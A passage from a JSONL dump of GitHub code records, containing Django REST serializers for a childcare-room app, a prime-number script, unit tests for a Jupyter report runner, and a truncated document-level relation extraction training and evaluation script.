.regression.random_forest_regression import RandomForestRegression\n from .regression.decision_tree_regression import DecisionTreeRegression\n\n tree_models = [\n BoostedTreesClassifier,\n BoostedTreesRegression,\n RandomForestClassifier,\n RandomForestRegression,\n DecisionTreeClassifier,\n DecisionTreeRegression,\n ]\n\n if any(isinstance(model, tree_model) for tree_model in tree_models):\n return \"none\"\n else:\n return \"impute\"\n","repo_name":"apple/turicreate","sub_path":"src/python/turicreate/toolkits/_supervised_learning.py","file_name":"_supervised_learning.py","file_ext":"py","file_size_in_byte":18958,"program_lang":"python","lang":"en","doc_type":"code","stars":11119,"dataset":"github-code","pt":"82"} +{"seq_id":"20609561016","text":"from rest_framework import serializers\n\n# from django.contrib.auth.models import User\n\nfrom django.contrib.auth.models import Group\nfrom django.contrib.admin.models import LogEntry\nfrom .models import (\n Child,\n Locality,\n Neighborhood,\n Gender,\n Cribroom,\n Shift,\n Guardian,\n PhoneFeature,\n GuardianType,\n Payout,\n Zone,\n UserAccount,\n Desinfection,\n Department,\n\n Co_management,\n Sectional,\n IdentType,\n Phone,\n CribroomUser,\n Poll,\n Question,\n Answer,\n ChildAnswer,\n TechnicalReport\n)\n\n\nclass PhoneSerializer(serializers.ModelSerializer):\n class Meta:\n model = Phone\n fields = \"__all__\"\n extra_kwargs = {\n }\n\nclass DepthPhoneSerializer(serializers.ModelSerializer):\n class Meta:\n model = Phone\n fields = \"__all__\"\n depth = 1\n\n # history = serializers.SerializerMethodField()\n\n # def get_history(self, obj):\n # model = obj.history.__dict__['model']\n # fields = \"__all__\"\n # serializer = HistoricalRecordSerializer(model, obj.history.all().order_by('history_date'), fields=fields, many=True)\n # serializer.is_valid()\n # return serializer.data\n\n # def get_age(self, obj):\n # return obj.age()\n\nclass CribroomUserSerializer(serializers.ModelSerializer):\n class Meta:\n model = CribroomUser\n fields = \"__all__\"\n\n extra_kwargs = {\n }\n\nclass DepthCribroomUserSerializer(serializers.ModelSerializer):\n class Meta:\n model = CribroomUser\n fields = \"__all__\"\n depth = 1\n\n # history = serializers.SerializerMethodField()\n\n # def get_history(self, obj):\n # model = obj.history.__dict__['model']\n # fields = \"__all__\"\n # serializer = HistoricalRecordSerializer(model, obj.history.all().order_by('history_date'), fields=fields, many=True)\n # serializer.is_valid()\n # return serializer.data\n\n\nclass PollSerializer(serializers.ModelSerializer):\n class Meta:\n model = Poll\n fields = \"__all__\"\n\nclass QuestionSerializer(serializers.ModelSerializer):\n class Meta:\n model = Question\n fields = \"__all__\"\n\nclass QuestionDepthSerializer(serializers.ModelSerializer):\n class Meta:\n model = Question\n fields = \"__all__\"\n depth = 1\n\nclass AnswerSerializer(serializers.ModelSerializer):\n class Meta:\n model = Answer\n fields = \"__all__\"\n\nclass AnswerDepthSerializer(serializers.ModelSerializer):\n class Meta:\n model = Answer\n fields = \"__all__\"\n depth = 1\n\nclass ChildAnswerSerializer(serializers.ModelSerializer):\n\n valueCorrectType = serializers.SerializerMethodField()\n\n def get_valueCorrectType(self, obj):\n return obj.returnValueAsAnswerType()\n\n class Meta:\n model = ChildAnswer\n fields = \"__all__\"\n\nclass ChildAnswerDepthSerializer(serializers.ModelSerializer):\n\n valueCorrectType = serializers.SerializerMethodField()\n\n def get_valueCorrectType(self, obj):\n return obj.returnValueAsAnswerType()\n\n class Meta:\n model = ChildAnswer\n fields = \"__all__\"\n depth = 1\n\n\nclass LocalitySerializer(serializers.ModelSerializer):\n class Meta:\n model = Locality\n fields = \"__all__\"\n \n \nclass IdentTypeSerializer(serializers.ModelSerializer):\n class Meta:\n model = IdentType\n fields = \"__all__\"\n \n \nclass SectionalSerializer(serializers.ModelSerializer):\n class Meta:\n model = Sectional\n fields = \"__all__\"\n \n \nclass Co_managementSerializer(serializers.ModelSerializer):\n class Meta:\n model = Co_management\n fields = \"__all__\"\n\n\nclass DepartmentSerializer(serializers.ModelSerializer):\n class Meta:\n model = Department\n fields = \"__all__\"\n\n\nclass NeighborhoodSerializer(serializers.ModelSerializer):\n class Meta:\n model = Neighborhood\n fields = \"__all__\"\n\n\nclass GenderSerializer(serializers.ModelSerializer):\n class Meta:\n model = Gender\n fields = \"__all__\"\n\n\nclass DesinfectionSerializer(serializers.ModelSerializer):\n class Meta:\n model = Desinfection\n fields = [\"date\"]\n\n\nclass CribroomSerializer(serializers.ModelSerializer):\n class Meta:\n model = Cribroom\n fields = \"__all__\"\n\n extra_kwargs = {\n \"name\": {\"required\": False},\n \"entity\": {\"required\": False},\n \"CUIT\": {\"required\": False},\n \"code\": {\"required\": False},\n \"max_capacity\": {\"required\": False},\n \"street\": {\"required\": False},\n \"house_number\": {\"required\": False},\n \"locality\": {\"required\": False},\n \"shift\": {\"required\": False},\n \"co_management\": {\"required\": False},\n }\n\nclass DepthCribroomSerializer(serializers.ModelSerializer):\n lastDesinfection = DesinfectionSerializer(read_only=True)\n actualCapacity = serializers.SerializerMethodField()\n reachMax = serializers.SerializerMethodField()\n\n class Meta:\n model = Cribroom\n fields = \"__all__\"\n depth = 1\n\n history = serializers.SerializerMethodField()\n\n def get_history(self, obj):\n model = obj.history.__dict__['model']\n fields = \"__all__\"\n serializer = HistoricalRecordSerializer(model, obj.history.all().order_by('history_date'), fields=fields, many=True)\n serializer.is_valid()\n return serializer.data\n\n\n def get_actualCapacity(self, obj):\n return obj.actualCapacity()\n\n def get_pays(self, obj):\n return obj.totalImport()\n\n def get_reachMax(self, obj):\n return obj.reachMax()\n\n \"\"\"\n ESTO ES PARA HACER DISPLAY DEL DICCIONARIO CON EL HISTORIAL/AUDITORIA\n RETURN HISTORIAL: list[dictionary{attribute: value, attribute: value}, dictionary{attribute: value, attribute: value}]\n \n history = serializers.SerializerMethodField()\n \n\n def get_history(self, instance):\n return instance.history.values()\n \n \"\"\"\n\n\nclass ShiftSerializer(serializers.ModelSerializer):\n class Meta:\n model = Shift\n fields = \"__all__\"\n\n\nclass GuardianSerializer(serializers.ModelSerializer):\n class Meta:\n model = Guardian\n fields = \"__all__\"\n\n extra_kwargs = {\n \"first_name\": {\"required\": False},\n \"last_name\": {\"required\": False},\n \"indentification\": {\"required\": False},\n \"ident_type\": {\"required\": False},\n }\n\nclass DepthGuardianSerializer(serializers.ModelSerializer):\n class Meta:\n model = Guardian\n depth = 1\n fields = \"__all__\"\n\n # history = serializers.SerializerMethodField()\n\n # def get_history(self, obj):\n # model = obj.history.__dict__['model']\n # fields = \"__all__\"\n # serializer = HistoricalRecordSerializer(model, obj.history.all().order_by('history_date'), fields=fields, many=True)\n # serializer.is_valid()\n # return serializer.data\n\n\nclass PhoneFeatureSerializer(serializers.ModelSerializer):\n class Meta:\n model = PhoneFeature\n fields = \"__all__\"\n\n\nclass GuardianTypeSerializer(serializers.ModelSerializer):\n class Meta:\n model = GuardianType\n fields = \"__all__\"\n\n\nclass ChildSerializer(serializers.ModelSerializer):\n\n class Meta:\n model = Child\n fields = \"__all__\"\n \n extra_kwargs = {\n \"first_name\": {\"required\": False},\n \"last_name\": {\"required\": False},\n \"indentification\": {\"required\": False},\n \"ident_type\": {\"required\": False},\n \"birthdate\": {\"required\": False},\n \"street\": {\"required\": False},\n \"house_number\": {\"required\": False},\n \"geolocation\": {\"required\": False},\n \"registration_date\": {\"required\": False},\n \"disenroll_date\": {\"required\": False},\n \"is_active\": {\"required\": False},\n \"locality\": {\"required\": False},\n \"neighborhood\": {\"required\": False},\n \"gender\": {\"required\": False},\n \"cribroom\": {\"required\": False},\n \"shift\": {\"required\": False},\n \"guardian\": {\"required\": False},\n }\n \n\nclass DepthChildSerializer(serializers.ModelSerializer):\n age = serializers.SerializerMethodField()\n\n class Meta:\n model = Child\n fields = \"__all__\"\n depth = 1\n\n history = serializers.SerializerMethodField()\n\n def get_history(self, obj):\n model = obj.history.__dict__['model']\n fields = \"__all__\"\n serializer = HistoricalRecordSerializer(model, obj.history.all().order_by('history_date'), fields=fields, many=True)\n serializer.is_valid()\n return serializer.data\n\n def get_age(self, obj):\n return obj.age()\n\n\nclass TechnicalReportSerializer(serializers.ModelSerializer):\n pays = serializers.SerializerMethodField()\n maxCapacityStr = serializers.SerializerMethodField()\n department = serializers.SerializerMethodField()\n\n class Meta:\n model = Cribroom\n depth = 1\n fields = \"__all__\"\n\n def get_pays(self, obj):\n initial_date = self.context.get(\"initial_date\")\n end_date = self.context.get(\"end_date\")\n return obj.totalImport(initial_date, end_date)\n\n def get_maxCapacityStr(self, obj):\n return obj.maxCapacityStr()\n \n def get_department(self, obj):\n return obj.get_department()\n\n\nclass GroupSerializer(serializers.ModelSerializer):\n class Meta:\n model = Group\n fields = [\"id\", \"name\"]\n\n\nclass PayoutSerializer(serializers.ModelSerializer):\n class Meta:\n model = Payout\n fields = \"__all__\"\n\nclass ZoneSerializer(serializers.ModelSerializer):\n class Meta:\n model = Zone\n fields = \"__all__\"\n\n\nclass UserSerializer(serializers.ModelSerializer):\n history = serializers.SerializerMethodField()\n\n def get_history(self, obj):\n model = obj.history.__dict__['model']\n fields = \"__all__\"\n serializer = HistoricalRecordSerializer(model, obj.history.all().order_by('history_date'), fields=fields, many=True)\n serializer.is_valid()\n return serializer.data\n\n\n class Meta:\n model = UserAccount\n fields = \"__all__\"\n\n\n\nclass LogEntrySerializer(serializers.ModelSerializer):\n class Meta:\n model = LogEntry\n depth = 1\n fields = \"__all__\"\n\n\n\nclass TechnicalReportTableSerializer(serializers.ModelSerializer):\n class Meta:\n model = TechnicalReport\n exclude = (\"id\",)\n\nclass HistoricalRecordSerializer(serializers.ModelSerializer):\n def __init__(self, model, *args, fields='__all__', **kwargs):\n self.Meta.model = model\n self.Meta.fields = fields\n super().__init__()\n\n class Meta:\n pass\n","repo_name":"santiago6124/SalasCuna","sub_path":"SalasCuna/SalasCuna_api/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":10902,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"82"} +{"seq_id":"70888253068","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Jan 26 20:31:31 2018\n求100内的素数\n@author: dk\n\"\"\"\nfor i in range(2,101):\n fg = 0\n for j in range(2,i-1):\n if i%j == 0:\n fg = 1\n break\n if fg == 0:\n print (i,end=\" \")\n\n\n \n ","repo_name":"cbw6666/c-100python-","sub_path":"p26.py","file_name":"p26.py","file_ext":"py","file_size_in_byte":271,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"} +{"seq_id":"18743139314","text":"import unittest\nimport mock\nimport analytics.cdr_ops.report_runner as runner\nfrom collections import OrderedDict\nimport copy\nfrom typing import Any, Dict\n\nfrom papermill.exceptions import PapermillExecutionError\n\n\nclass TestNotebookRunner(unittest.TestCase):\n\n @classmethod\n def setUpClass(cls):\n print('**************************************************************')\n print(cls.__name__)\n print('**************************************************************')\n\n def setUp(self):\n self.notebook_py_path = 'my_notebook_path.py'\n self.notebook_ipynb_path = 'my_notebook_path.ipynb'\n self.notebook_html_path = 'my_notebook_path.html'\n\n @mock.patch('jupytext.write')\n @mock.patch('jupytext.read')\n @mock.patch('analytics.cdr_ops.report_runner.PurePath')\n def test_create_ipynb_from_py(self, mock_pure_path, mock_read, mock_write):\n # Define the return object for PurePath constructor\n pure_path_returned_value = mock.MagicMock(\n name='returned_value_pure_path', return_value=self.notebook_py_path)\n mock_pure_path.return_value = pure_path_returned_value\n\n # Set up with_suffix\n mock_with_suffix = mock_pure_path.return_value.with_suffix\n with_suffix_returned_value = mock.MagicMock(\n name='with_suffix', return_value=self.notebook_ipynb_path)\n # This makes sure str(MagicMock) returns the desired value\n with_suffix_returned_value.__str__.return_value = self.notebook_ipynb_path\n mock_with_suffix.return_value = with_suffix_returned_value\n\n # Set up jupytext.read value\n jupytext_returned_value = mock.MagicMock(name='mock_read_return_value')\n mock_read.return_value = jupytext_returned_value\n\n # Assertions\n actual_value = runner.create_ipynb_from_py(self.notebook_py_path)\n self.assertEqual(self.notebook_ipynb_path, actual_value)\n\n mock_pure_path.assert_called_once_with(self.notebook_py_path)\n mock_read.assert_called_once_with(pure_path_returned_value)\n mock_with_suffix.assert_called_once_with(runner.IPYNB_SUFFIX)\n mock_write.assert_called_once_with(jupytext_returned_value,\n with_suffix_returned_value)\n\n @mock.patch('nbformat.reads')\n @mock.patch('builtins.open',\n new_callable=mock.mock_open,\n read_data='fake_data')\n @mock.patch('analytics.cdr_ops.report_runner.HTMLExporter')\n @mock.patch('analytics.cdr_ops.report_runner.PurePath')\n def test_create_html_from_ipynb(self, mock_pure_path, mock_html_exporter,\n mock_open, mock_nbformat_reads):\n # Define the return object for PurePath constructor\n pure_path_returned_value = mock.MagicMock(\n name='returned_value_pure_path',\n return_value=self.notebook_ipynb_path)\n mock_pure_path.return_value = pure_path_returned_value\n\n # Set up with_suffix\n mock_with_suffix = mock_pure_path.return_value.with_suffix\n with_suffix_returned_value = mock.MagicMock(\n name='with_suffix', return_value=self.notebook_html_path)\n # This makes sure str(MagicMock) returns the desired value\n with_suffix_returned_value.__str__.return_value = self.notebook_html_path\n mock_with_suffix.return_value = with_suffix_returned_value\n\n # Set up html_exporter\n mock_html_exporter.return_value.from_notebook_node.return_value = (\n 'return fake_data', '')\n\n runner.create_html_from_ipynb(self.notebook_ipynb_path)\n\n # Assertions in reading the notebook\n mock_open.assert_any_call(self.notebook_ipynb_path,\n 'r',\n encoding='utf-8')\n mock_nbformat_reads.assert_any_call('fake_data', as_version=4)\n mock_html_exporter.return_value.from_notebook_node.assert_any_call(\n mock_nbformat_reads.return_value)\n\n # Assertions in writing the notebook to a html page\n mock_open.assert_any_call(with_suffix_returned_value,\n 'w',\n encoding='utf-8')\n mock_open.return_value.write.assert_any_call('return fake_data')\n\n def test_infer_required(self):\n\n def create_base_dict() -> Dict[Any, Any]:\n return OrderedDict({'name': 'dataset_id', 'default': '\"\"'})\n\n base_dict = create_base_dict()\n\n # Case 1 default = '\"\"'\n actual = runner.infer_required(base_dict)\n expected = copy.deepcopy(base_dict)\n expected['required'] = True\n self.assertEqual(actual, expected)\n\n # Case 2 default = '\\'\\''\n base_dict['default'] = '\\'\\''\n actual = runner.infer_required(base_dict)\n expected = copy.deepcopy(base_dict)\n expected['required'] = True\n self.assertEqual(actual, expected)\n\n # Case 3 default = 'None'\n base_dict['default'] = 'None'\n actual = runner.infer_required(base_dict)\n expected = copy.deepcopy(base_dict)\n expected['required'] = True\n self.assertEqual(actual, expected)\n\n # Case 4 default = None\n base_dict['default'] = None\n actual = runner.infer_required(base_dict)\n expected = copy.deepcopy(base_dict)\n expected['required'] = True\n self.assertEqual(actual, expected)\n\n # Case 4 default = 'dataset_id'\n base_dict['default'] = 'dataset_id'\n actual = runner.infer_required(base_dict)\n expected = copy.deepcopy(base_dict)\n expected['required'] = False\n self.assertEqual(actual, expected)\n\n @mock.patch('analytics.cdr_ops.report_runner.is_parameter_required')\n @mock.patch('analytics.cdr_ops.report_runner.infer_notebook_params')\n def test_validate_notebook_params(self, mock_infer_notebook_params,\n mock_is_parameter_required):\n\n mock_infer_notebook_params.return_value = [\n ('dataset_id', OrderedDict({\n 'name': 'dataset_id',\n 'type': 'string'\n })),\n ('old_rdr', OrderedDict({\n 'name': 'old_rdr',\n 'type': 'string'\n })),\n ]\n\n notebook_path = 'my_notebook_path.ipynb'\n\n #Test normal case\n mock_is_parameter_required.side_effect = [True, False]\n provided_params = {'dataset_id': '23486219', 'old_rdr': '20200114'}\n result = runner.validate_notebook_params(notebook_path, provided_params)\n self.assertTrue(result)\n\n #Test expected call counts\n self.assertEqual(mock_is_parameter_required.call_count, 2)\n mock_infer_notebook_params.assert_any_call(notebook_path)\n\n #Test missing value\n mock_is_parameter_required.side_effect = [True, False]\n provided_params = {'dataset_id': None, 'old_rdr': '20200114'}\n result = runner.validate_notebook_params(notebook_path, provided_params)\n self.assertFalse(result)\n\n #Test missing parameter\n mock_is_parameter_required.side_effect = [True, False]\n provided_params = {'old_rdr': '20200114'}\n result = runner.validate_notebook_params(notebook_path, provided_params)\n self.assertFalse(result)\n\n #Test unknown parameter\n mock_is_parameter_required.side_effect = [True, False]\n provided_params = {\n 'dataset_id': '23486219',\n 'old_rdr': '20200114',\n 'new_rdr': '20210104'\n }\n result = runner.validate_notebook_params(notebook_path, provided_params)\n self.assertFalse(result)\n\n @mock.patch('analytics.cdr_ops.report_runner.infer_notebook_params')\n def test_display_notebook_help(self, mock_infer_notebook_params):\n #Doesn't do much, but useful for testing if function runs\n mock_infer_notebook_params.return_value = [\n ('dataset_id',\n OrderedDict({\n 'name': 'dataset_id',\n 'inferred_type_name': 'str',\n 'default': '',\n 'required': True,\n 'help': 'help 1'\n })),\n ('old_rdr',\n OrderedDict({\n 'name': 'old_rdr',\n 'inferred_type_name': 'str',\n 'default': 'str',\n 'required': True,\n 'help': 'help 2'\n })),\n ]\n\n notebook_path = 'my_notebook_path.ipynb'\n\n runner.display_notebook_help(notebook_path)\n\n def test_is_parameter_required(self):\n # value of required=True should return True\n properties = OrderedDict({\n 'name': 'dataset_id',\n 'type': 'string',\n 'required': True\n })\n\n result = runner.is_parameter_required(properties)\n self.assertTrue(result)\n\n properties = OrderedDict({'name': 'dataset_id', 'type': 'string'})\n\n result = runner.is_parameter_required(properties)\n self.assertTrue(result)\n\n # value of required=True should return False\n properties = OrderedDict({\n 'name': 'dataset_id',\n 'type': 'string',\n 'required': False\n })\n\n result = runner.is_parameter_required(properties)\n self.assertFalse(result)\n\n @mock.patch('analytics.cdr_ops.report_runner.create_html_from_ipynb')\n @mock.patch('analytics.cdr_ops.report_runner.execute_notebook')\n @mock.patch('analytics.cdr_ops.report_runner.display_notebook_help')\n @mock.patch('analytics.cdr_ops.report_runner.validate_notebook_params')\n @mock.patch('analytics.cdr_ops.report_runner.create_ipynb_from_py')\n def test_main(self, mock_create_ipynb_from_py,\n mock_validate_notebook_params, mock_display_notebook_help,\n mock_execute_notebook, mock_create_html_from_ipynb):\n ipynb_path = self.notebook_ipynb_path\n mock_create_ipynb_from_py.return_value = ipynb_path\n\n #Case where help_notebook == True\n mock_validate_notebook_params.return_value = True\n notebook_jupytext_path = self.notebook_py_path\n params = {'dataset_id': '3142352351', 'old_rdr': '20201003'}\n output_path = 'my_notebook.html'\n help_notebook = True\n\n with self.assertRaises(SystemExit):\n runner.main(notebook_jupytext_path, params, output_path,\n help_notebook)\n\n mock_display_notebook_help.assert_called_once_with(ipynb_path)\n\n #Case where help_notebook == False and notebook params invalid\n mock_display_notebook_help.reset_mock()\n\n mock_validate_notebook_params.return_value = False\n notebook_jupytext_path = self.notebook_py_path\n params = {'dataset_id': '3142352351', 'old_rdr': '20201003'}\n output_path = 'my_notebook.html'\n help_notebook = False\n\n with self.assertRaises(SystemExit):\n runner.main(notebook_jupytext_path, params, output_path,\n help_notebook)\n\n mock_display_notebook_help.assert_called_once_with(ipynb_path)\n\n # Case where help_notebook == False and notebook params valid\n mock_display_notebook_help.reset_mock()\n\n mock_validate_notebook_params.return_value = True\n notebook_jupytext_path = 'my_notebook.py'\n params = {'dataset_id': '3142352351', 'old_rdr': '20201003'}\n output_path = 'my_notebook.html'\n help_notebook = False\n\n runner.main(notebook_jupytext_path, params, output_path, help_notebook)\n mock_execute_notebook.assert_called_once()\n\n #Test that html is created even after Papermill execution error\n mock_execute_notebook.side_effect = PapermillExecutionError(\n 0, 1, 'test', 'test', 'test', '')\n\n mock_execute_notebook.reset_mock()\n mock_create_html_from_ipynb.reset_mock()\n\n runner.main(notebook_jupytext_path, params, output_path, help_notebook)\n mock_execute_notebook.assert_called_once()\n mock_create_html_from_ipynb.assert_called_once()\n\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"all-of-us/curation","sub_path":"tests/unit_tests/data_steward/analytics/cdr_ops/report_runner_test.py","file_name":"report_runner_test.py","file_ext":"py","file_size_in_byte":12146,"program_lang":"python","lang":"en","doc_type":"code","stars":16,"dataset":"github-code","pt":"82"} +{"seq_id":"73360527948","text":"import argparse\r\nimport os\r\n\r\nimport numpy as np\r\nimport torch\r\nimport json\r\nfrom torch.utils.data import DataLoader\r\nfrom transformers import AutoConfig, AutoModel, AutoTokenizer\r\nfrom transformers.optimization import AdamW, get_linear_schedule_with_warmup\r\nfrom transformers.optimization import get_constant_schedule_with_warmup\r\nfrom model import DocREModel\r\nfrom utils import set_seed, collate_fn\r\nfrom prepro import read_cdr, read_gda, read_docred\r\nfrom adj_utils import convert_3dsparse_to_4dsparse\r\n# import wandb\r\nfrom time import time\r\n\r\nrel2id1 = json.load(open('./meta/rel2id1.json', 'r'))\r\nid2rel = {value: key for key, value in rel2id1.items()}\r\n\r\ndef train(args, model, train_features, dev_features):\r\n def fintune(features, optimizer, num_epoch, num_steps):\r\n best_score = -1\r\n train_dataloader = DataLoader(features, batch_size=args.train_batch_size, shuffle=True,\r\n collate_fn=collate_fn, drop_last=True)\r\n train_iterator = range(int(num_epoch))\r\n total_steps = int(len(train_dataloader) * num_epoch // args.gradient_accumulation_steps)\r\n warmup_steps = int(total_steps * args.warmup_ratio)\r\n #scheduler = get_linear_schedule_with_warmup(optimizer, num_warmup_steps=warmup_steps,\r\n # num_training_steps=total_steps)\r\n scheduler = get_constant_schedule_with_warmup(optimizer, num_warmup_steps=warmup_steps)\r\n\r\n print(\"Total steps: {}\".format(total_steps))\r\n print(\"Warmup steps: {}\".format(warmup_steps))\r\n for epoch in train_iterator:\r\n t1 = time()\r\n model.zero_grad()\r\n for step, batch in enumerate(train_dataloader):\r\n model.train()\r\n adjacency = convert_3dsparse_to_4dsparse(batch[5]).to(args.device)\r\n inputs = {'input_ids': batch[0].to(args.device),\r\n 'attention_mask': batch[1].to(args.device),\r\n 'labels': batch[2],\r\n 'entity_pos': batch[3],\r\n 'hts': batch[4],\r\n 'adjacency': adjacency,\r\n 'link_pos': batch[6],\r\n 'nodes_info': batch[7],\r\n }\r\n outputs = model(**inputs)\r\n loss = outputs[0] / args.gradient_accumulation_steps\r\n loss.backward()\r\n if step % args.gradient_accumulation_steps == 0:\r\n if args.max_grad_norm > 0:\r\n torch.nn.utils.clip_grad_norm_(model.parameters(), args.max_grad_norm)\r\n optimizer.step()\r\n scheduler.step()\r\n model.zero_grad()\r\n num_steps += 1\r\n\r\n if (step + 1) == len(train_dataloader) - 1 or (args.evaluation_steps > 0 and num_steps % args.evaluation_steps == 0 and step % args.gradient_accumulation_steps == 0):\r\n dev_score, dev_output = evaluate(args, model, dev_features, tag=\"dev\")\r\n #test_score, test_output = evaluate(args, model, test_features, tag=\"test\")\r\n t2 = time()\r\n print(f'epoch:{epoch}, time:{humanized_time(t2-t1)}, loss:{loss}')\r\n print(dev_output)\r\n #print(test_output)\r\n if dev_score > best_score:\r\n best_score = dev_score\r\n if args.save_path != \"\":\r\n torch.save(model.state_dict(), args.save_path)\r\n with open('./saved_model/log.txt', 'a') as f:\r\n f.writelines(f'epoch:{epoch}\\n')\r\n f.writelines(f'{dev_output}\\n')\r\n #f.writelines(f'{test_output}\\n')\r\n f.writelines('\\n')\r\n\r\n return num_steps\r\n\r\n new_layer = [\"extractor\", \"bilinear\", \"Linear\", \"gcn\", \"reason\", \"fusion\"]\r\n\r\n optimizer_grouped_parameters = [\r\n {\"params\": [p for n, p in model.named_parameters() if not any(nd in n for nd in new_layer)], },\r\n {\"params\": [p for n, p in model.named_parameters() if any(nd in n for nd in new_layer)], \"lr\": 1e-4},\r\n ]\r\n\r\n optimizer = AdamW(optimizer_grouped_parameters, lr = args.learning_rate,eps = args.adam_epsilon)\r\n num_steps = 0\r\n set_seed(args)\r\n model.zero_grad()\r\n fintune(train_features, optimizer, args.num_train_epochs, num_steps)\r\n\r\ndef evaluate(args, model, features, tag = \"dev\"):\r\n\r\n dataloader = DataLoader(features, batch_size=args.test_batch_size, shuffle=False,\r\n collate_fn=collate_fn, drop_last=False)\r\n preds, golds, dists = [], [], []\r\n for batch in dataloader:\r\n model.eval()\r\n adjacency = convert_3dsparse_to_4dsparse(batch[5]).to(args.device)\r\n inputs = {'input_ids': batch[0].to(args.device),\r\n 'attention_mask': batch[1].to(args.device),\r\n 'entity_pos': batch[3],\r\n 'hts': batch[4],\r\n 'adjacency': adjacency,\r\n 'link_pos': batch[6],\r\n 'nodes_info': batch[7],\r\n }\r\n\r\n with torch.no_grad():\r\n pred, *_ = model(**inputs)\r\n pred = pred.cpu().numpy()\r\n pred[np.isnan(pred)] = 0\r\n preds.append(pred)\r\n golds.append(np.concatenate([np.array(label, np.float32) for label in batch[2]], axis=0))\r\n #dists.append(np.concatenate([np.array(dist, np.float32) for dist in batch[8]], axis=0))\r\n\r\n preds = np.concatenate(preds, axis=0).astype(np.float32)\r\n golds = np.concatenate(golds, axis=0).astype(np.float32)\r\n #dists = np.concatenate(dists, axis=0).astype(np.float32)\r\n\r\n #计算结果\r\n #首先通过preds和features得到预测的关系实例{'title': ;'h_idx': ;'t_idx': ;'r': }\r\n h_idx, t_idx, title = [], [], [] #存放头尾实体,及文章标题\r\n\r\n for f in features:\r\n hts = f['hts']\r\n h_idx += [ht[0] for ht in hts] #取头实体\r\n t_idx += [ht[1] for ht in hts]\r\n title += [f[\"title\"] for ht in hts]\r\n\r\n res = []\r\n for i in range(preds.shape[0]): #取预测关系类型\r\n pred = preds[i]\r\n pred = np.nonzero(pred)[0].tolist()\r\n for p in pred:\r\n if p != 0:\r\n res.append(\r\n {\r\n 'title': title[i],\r\n 'h_idx': h_idx[i],\r\n 't_idx': t_idx[i],\r\n 'r': id2rel[p]\r\n }\r\n )\r\n if len(res) > 0:\r\n best_p, best_r, best_f1, _, best_f1_ign, _ = official_evaluate(res,args.data_dir)\r\n output = {\r\n \"{}_p\".format(tag): best_p * 100,\r\n \"{}_r\".format(tag): best_r * 100,\r\n \"{}_f1\".format(tag): best_f1 * 100,\r\n \"{}_f1_ign\".format(tag): best_f1_ign * 100,\r\n }\r\n return best_f1, output\r\n\r\n\r\ndef gen_train_facts(data_file_name, truth_dir):\r\n fact_file_name = data_file_name[data_file_name.find(\"train_\"):]\r\n fact_file_name = os.path.join(truth_dir, fact_file_name.replace(\".json\", \".fact\"))\r\n\r\n if os.path.exists(fact_file_name):\r\n fact_in_train = set([])\r\n triples = json.load(open(fact_file_name))\r\n for x in triples:\r\n fact_in_train.add(tuple(x))\r\n return fact_in_train\r\n\r\n fact_in_train = set([])\r\n ori_data = json.load(open(data_file_name))\r\n for data in ori_data:\r\n vertexSet = data['vertexSet']\r\n for label in data['labels']:\r\n rel = label['r']\r\n for n1 in vertexSet[label['h']]:\r\n for n2 in vertexSet[label['t']]:\r\n fact_in_train.add((n1['name'], n2['name'], rel)) #用来和ans计算得分\r\n\r\n json.dump(list(fact_in_train), open(fact_file_name, \"w\"))\r\n\r\n return fact_in_train\r\n\r\n\r\ndef official_evaluate(tmp, path):\r\n '''\r\n Adapted from the official evaluation code\r\n '''\r\n truth_dir = os.path.join(path, 'ref')\r\n\r\n if not os.path.exists(truth_dir):\r\n os.makedirs(truth_dir)\r\n\r\n fact_in_train_annotated = gen_train_facts(os.path.join(path, \"train_annotated.json\"), truth_dir)\r\n fact_in_train_distant = gen_train_facts(os.path.join(path, \"train_distant.json\"), truth_dir)\r\n\r\n truth = json.load(open(os.path.join(path, \"dev.json\")))\r\n\r\n std = {} #每篇文档中关系三元组的一个证据句集和\r\n tot_evidences = 0 #一篇文档中所有关系证据长度总和,?\r\n titleset = set([])\r\n\r\n title2vectexSet = {}\r\n\r\n for x in truth:\r\n title = x['title']\r\n titleset.add(title)\r\n\r\n vertexSet = x['vertexSet']\r\n title2vectexSet[title] = vertexSet\r\n\r\n for label in x['labels']:\r\n r = label['r']\r\n h_idx = label['h']\r\n t_idx = label['t']\r\n std[(title, r, h_idx, t_idx)] = set(label['evidence'])\r\n tot_evidences += len(label['evidence'])\r\n\r\n tot_relations = len(std)\r\n tmp.sort(key=lambda x: (x['title'], x['h_idx'], x['t_idx'], x['r']))\r\n submission_answer = [tmp[0]]\r\n for i in range(1, len(tmp)):\r\n x = tmp[i] #tmp[1]\r\n y = tmp[i - 1] #tmp[0]\r\n if (x['title'], x['h_idx'], x['t_idx'], x['r']) != (y['title'], y['h_idx'], y['t_idx'], y['r']):\r\n submission_answer.append(tmp[i])\r\n\r\n correct_re = 0\r\n correct_evidence = 0\r\n pred_evi = 0\r\n\r\n correct_in_train_annotated = 0\r\n correct_in_train_distant = 0\r\n titleset2 = set([])\r\n for x in submission_answer:\r\n title = x['title']\r\n h_idx = x['h_idx']\r\n t_idx = x['t_idx']\r\n r = x['r']\r\n titleset2.add(title)\r\n if title not in title2vectexSet:\r\n continue\r\n vertexSet = title2vectexSet[title]\r\n\r\n if 'evidence' in x:\r\n evi = set(x['evidence'])\r\n else:\r\n evi = set([])\r\n pred_evi += len(evi)\r\n\r\n if (title, r, h_idx, t_idx) in std:\r\n correct_re += 1 #预测三元组在真实label中,则TP+1\r\n stdevi = std[(title, r, h_idx, t_idx)]\r\n correct_evidence += len(stdevi & evi)\r\n in_train_annotated = in_train_distant = False\r\n for n1 in vertexSet[h_idx]:\r\n for n2 in vertexSet[t_idx]:\r\n if (n1['name'], n2['name'], r) in fact_in_train_annotated:\r\n in_train_annotated = True\r\n if (n1['name'], n2['name'], r) in fact_in_train_distant:\r\n in_train_distant = True\r\n\r\n if in_train_annotated:\r\n correct_in_train_annotated += 1\r\n if in_train_distant:\r\n correct_in_train_distant += 1\r\n\r\n re_p = 1.0 * correct_re / len(submission_answer) #精确率\r\n re_r = 1.0 * correct_re / tot_relations #召回率\r\n if re_p + re_r == 0:\r\n re_f1 = 0\r\n else:\r\n re_f1 = 2.0 * re_p * re_r / (re_p + re_r) #F1\r\n\r\n evi_p = 1.0 * correct_evidence / pred_evi if pred_evi > 